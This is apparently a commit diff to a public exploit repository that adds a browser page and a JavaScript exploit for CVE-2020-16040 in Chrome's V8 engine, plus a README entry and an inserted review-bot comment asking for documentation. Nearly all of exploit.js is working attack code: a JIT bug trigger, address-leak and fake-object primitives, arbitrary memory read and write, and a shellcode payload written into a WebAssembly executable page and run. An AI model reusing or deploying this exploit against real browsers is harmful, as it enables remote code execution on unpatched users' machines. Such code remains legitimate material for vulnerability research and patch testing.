
Commit 79e90d5

Exploit for CVE-2020-16040
1 parent e07d904 commit 79e90d5


3 files changed

+100
-0
lines changed


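--- a/CVE-2020-16040/exploit.html
+++ b/CVE-2020-16040/exploit.html
@@ -0,0 +1 @@
+<script src="exploit.js"></script>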

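--- a/CVE-2020-16040/exploit.js
+++ b/CVE-2020-16040/exploit.js
@@ -0,0 +1,98 @@
+var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
+var wasm_mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(wasm_mod);
+var f = wasm_instance.exports.main;
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+let buf2 = new ArrayBuffer(0x150);
+
+function ftoi(val) {
+f64_buf[0] = val;
+return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+
+function itof(val) {
+u64_buf[0] = Number(val & 0xffffffffn);
+u64_buf[1] = Number(val >> 32n);
+return f64_buf[0];
+}
+
+function foo(a) {
+var y = 0x7fffffff;
+
+if (a == NaN) y = NaN;
+if (a) y = -1;
+
+let z = y + 1;
+z >>= 31;
+z = 0x80000000 - Math.sign(z|1);
+
+if(a) z = 0;
+
+var arr = new Array(0-Math.sign(z));
+arr.shift();
+var cor = [1.1, 1.2, 1.3];
+
+return [arr, cor];
+}
+
+for(var i=0;i<0x3000;++i)
+foo(true);
+
+var x = foo(false);
+var arr = x[0];
+var cor = x[1];
+
+const idx = 6;
+arr[idx+10] = 0x4242;
+
+function addrof(k) {
+arr[idx+1] = k;
+return ftoi(cor[0]) & 0xffffffffn;
+}
+
+function fakeobj(k) {
+cor[0] = itof(k);
+return arr[idx+1];
+}
+
+var float_array_map = ftoi(cor[3]);
+
+var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+var fake = fakeobj(addrof(arr2) + 0x20n);
+
+function arbread(addr) {
+if (addr % 2n == 0) {
+addr += 1n;
+}
+arr2[1] = itof((2n << 32n) + addr - 8n);
+return (fake[0]);
+}
+
+function arbwrite(addr, val) {
+if (addr % 2n == 0) {
+addr += 1n;
+}
+arr2[1] = itof((2n << 32n) + addr - 8n);
+fake[0] = itof(BigInt(val));
+}
+
+function copy_shellcode(addr, shellcode) {
+let dataview = new DataView(buf2);
+let buf_addr = addrof(buf2);
+let backing_store_addr = buf_addr + 0x14n;
+arbwrite(backing_store_addr, addr);
+
+for (let i = 0; i < shellcode.length; i++) {
+dataview.setUint32(4*i, shellcode[i], true);
+}
+}
+
+var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
+console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
+var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157];
+/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode
+copy_shellcode(rwx_page_addr, shellcode);
+f();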
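Review bot: exploit.js carries no header comment identifying what it is a proof of concept for, so a reader has to reconstruct that from the README; the README entry added in the same commit gives the affected range as Chrome versions <= 87.0.4280.88 but links to chrome-exploit/exploit.js rather than this file's path CVE-2020-16040/exploit.js, so the identification should live in the file itself. A first line such as `// CVE-2020-16040 proof of concept; affected Chrome versions <= 87.0.4280.88 per README` would cover it. The wasm_code blob on line 1 is likewise undocumented; its function body ends in `65,42,11`, i.e. i32.const 42 / end, so `// minimal wasm module exporting main() that returns 42; its instance is what rwx_page_addr is later read from` states what the bytes are without the reader decoding them. The shellcode arrays on lines 95-96 would also benefit from a comment naming the platform each one is for, since only the commented-out one is labelled.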

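--- a/README.md
+++ b/README.md
@@ -3,3 +3,4 @@
 [CVE-2021-3156](https://github.com/r4j0x00/exploits/blob/master/CVE-2021-3156/exploit.c): Linux local privilege escalation through heap overflow in sudo ([Demo](https://twitter.com/r4j0x00/status/1355489323794108417))
 [CVE-2021-3156 One shot exploit](https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156_one_shot)
 [CVE-2020-6507](https://github.com/r4j0x00/exploits/blob/master/chrome-exploit/exploit.js): Out of bounds write in V8. Chrome versions <= 83.0.4103.97. (RCE)
+[CVE-2020-16040](https://github.com/r4j0x00/exploits/blob/master/chrome-exploit/exploit.js): Chrome exploit versions <= 87.0.4280.88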
